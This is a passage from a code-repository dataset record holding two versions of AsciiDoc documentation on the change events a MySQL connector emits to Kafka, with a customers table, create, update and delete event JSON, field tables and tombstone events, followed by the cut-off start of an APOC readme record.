\"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"mysql-server-1.inventory.customers.Envelope\" \/\/ <2>\n },\n \"payload\": { \/\/ <3>\n \"op\": \"c\", \/\/ <4>\n \"ts_ms\": 1465491411815, \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 0,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"INSERT INTO customers (first_name, last_name, email) VALUES ('Anne', 'Kretchmar', 'annek@noanswer.org')\"\n }\n }\n}\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table. \n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. In this example: \n\n* `mysql-server-1.inventory.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table.\n\n* `io.product.connector.mysql.Source` is the schema for the payload's `source` field. This schema is specific to the MySQL connector. The connector uses it for all events that it generates. \n\n* `mysql-server-1.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `mysql-server-1` is the connector name, `inventory` is the database, and `customers` is the table.\n\nifdef::community[]\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\nendif::community[]\n\n|3\n|`payload`\n|The value's actual data. This is the information that the change event is providing. \n\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|4\n|`op`\na| Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are: \n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|5\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|6\n|`before`\n| An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content. \n\n|7\n|`after`\n| An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|8\n|`source`\na| Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the new row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events-for-cdc_{context}[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|===\n\n[id=\"mysql-update-events\"]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": { \/\/ <2>\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 1465581,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 223344,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 484,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"UPDATE customers SET first_name='Anne Marie' WHERE id=1004\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1465581029523 \n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, the `first_name` value is `Anne.`\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `first_name` value is now `Anne Marie`. \n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event is from a different position in the binlog. The source metadata includes: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the updated row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events-for-cdc_{context}[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-mysql-connector}#mysql-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section. \n====\n\n[id=\"mysql-primary-key-updates\"]\n=== Primary key updates\n\nAn `UPDATE` operation that changes a row's primary key field(s) is known\nas a primary key change. For a primary key change, in place of an `UPDATE` event record, the connector emits a `DELETE` event record for the old key and a `CREATE` event record for the new (updated) key. These events have the usual structure and content, and in addition, each one has a message header related to the primary key change: \n\n* The `DELETE` event record has `__debezium.newkey` as a message header. The value of this header is the new primary key for the updated row.\n\n* The `CREATE` event record has `__debezium.oldkey` as a message header. The value of this header is the previous (old) primary key that the updated row had.\n\n[id=\"mysql-delete-events\"]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 1465581,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 223344,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 805,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"DELETE FROM customers WHERE id=1004\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `pos` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the updated row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events-for-cdc_{context}[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nMySQL connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[id=\"mysql-tombstone-events\"]\n.Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s MySQL connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n","old_contents":"\/\/ Metadata created by nebel\n\/\/\n[id=\"mysql-connector-events_{context}\"]\n= MySQL connector events\n\nThe {prodname} MySQL connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed. \n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained. \n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converver and you configure it to produce all four basic change event parts, change events have this structure: \n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/<1>\n ...\n },\n \"payload\": { \/\/<2>\n ...\n },\n \"schema\": { \/\/<3> \n ...\n },\n \"payload\": { \/\/<4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. \n\nRarely, converter configuration overrides the key column with some other structure. In this case, the first schema field describes that structure.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed. \n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas. \n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-mysql-connector}#the-mysql-connector-and-kafka-topics_{context}[MySQL connector and Kafka topics].\n\n[WARNING]\n====\nThe MySQL connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\n== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table. \n\n.Example table\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks like this:\n\n[source,json,index=0]\n----\n{\n \"schema\": { <1>\n \"type\": \"struct\",\n \"name\": \"mysql-server-1.inventory.customers.Key\", <2>\n \"optional\": false, <3>\n \"fields\": [ <4>\n {\n \"field\": \"id\",\n \"type\": \"int32\",\n \"optional\": false\n }\n ]\n },\n \"payload\": { <5>\n \"id\": 1001\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion. \n\n|2\n|`mysql-server-1.inventory.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: + \n\n* `mysql-server-1` is the name of the connector that generated this event. + \n* `inventory` is the database that contains the table that was changed. +\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields` \n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `id` field whose value is `1001`.\n\n|===\n\n== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure. \n\nConsider the same sample table that was used to show an example of a change event key: \n\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\nThe value portion of a change event for a change to this table is described for each event type: \n\n* <<mysql-create-events,_create_ events>>\n* <<mysql-update-events,_update_ events>>\n* <<mysql-delete-events,_delete_ events>>\n\n[id=\"mysql-create-events\"]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \/\/ <2>\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.product.connector.mysql.Source\", \/\/ <2>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"mysql-server-1.inventory.customers.Envelope\" \/\/ <2>\n },\n \"payload\": { \/\/ <3>\n \"op\": \"c\", \/\/ <4>\n \"ts_ms\": 1465491411815, \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_ms\": 0,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"INSERT INTO customers (first_name, last_name, email) VALUES ('Anne', 'Kretchmar', 'annek@noanswer.org')\"\n }\n }\n}\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table. \n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. In this example: \n\n* `mysql-server-1.inventory.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table.\n\n* `io.product.connector.mysql.Source` is the schema for the payload's `source` field. This schema is specific to the MySQL connector. The connector uses it for all events that it generates. \n\n* `mysql-server-1.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `mysql-server-1` is the connector name, `inventory` is the database, and `customers` is the table.\n\nifdef::community[]\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\nendif::community[]\n\n|3\n|`payload`\n|The value's actual data. This is the information that the change event is providing. \n\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|4\n|`op`\na| Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are: \n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|5\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|6\n|`before`\n| An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content. \n\n|7\n|`after`\n| An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|8\n|`source`\na| Mandatory field that describes the source metadata for the event. The `source` structure shows MySQL information about this change, which provides traceability. It also has information you can use to compare to other events in this and other topics to know whether this event occurred before, after, or as part of the same MySQL commit as other events. The source metadata includes: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the new row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events-for-cdc_{context}[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|===\n\n[id=\"mysql-update-events\"]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": { \/\/ <2>\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_ms\": 1465581,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 223344,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 484,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"UPDATE customers SET first_name='Anne Marie' WHERE id=1004\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1465581029523 \n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, the `first_name` value is `Anne.`\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `first_name` value is now `Anne Marie`. \n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event is from a different position in the binlog. The source metadata includes: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the updated row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events-for-cdc_{context}[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-mysql-connector}#mysql-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section. \n====\n\n[id=\"mysql-primary-key-updates\"]\n=== Primary key updates\n\nAn `UPDATE` operation that changes a row's primary key field(s) is known\nas a primary key change. For a primary key change, in place of an `UPDATE` event record, the connector emits a `DELETE` event record for the old key and a `CREATE` event record for the new (updated) key. These events have the usual structure and content, and in addition, each one has a message header related to the primary key change: \n\n* The `DELETE` event record has `__debezium.newkey` as a message header. The value of this header is the new primary key for the updated row.\n\n* The `CREATE` event record has `__debezium.oldkey` as a message header. The value of this header is the previous (old) primary key that the updated row had.\n\n[id=\"mysql-delete-events\"]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_ms\": 1465581,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 223344,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 805,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"DELETE FROM customers WHERE id=1004\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `pos` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the updated row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events-for-cdc_{context}[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nMySQL connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[id=\"mysql-tombstone-events\"]\n.Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s MySQL connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f304341aa434782e5bd709e5882c78bf09f58e7","subject":"Release version 3.5.0.5","message":"Release version 3.5.0.5\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":":readme:\n:branch: 3.5\n:docs: https:\/\/neo4j.com\/docs\/labs\/apoc\/current\n:apoc-release: 3.5.0.5\n:neo4j-version: 3.5.11\n:img: https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/docs\/images\n\n= Awesome Procedures for Neo4j {branch}.x\n\n\/\/ tag::readme[]\n\n== Introduction\n\n\/\/ tag::intro[]\nimage::{img}\/apoc.gif[float=right]\n\n\/\/ tag::intro-text[]\nNeo4j 3.x introduced the concept of user-defined procedures and functions.\nThose are custom implementations of certain functionality, that can't be (easily) expressed in Cypher itself.\nThey are implemented in Java and can be easily deployed into your 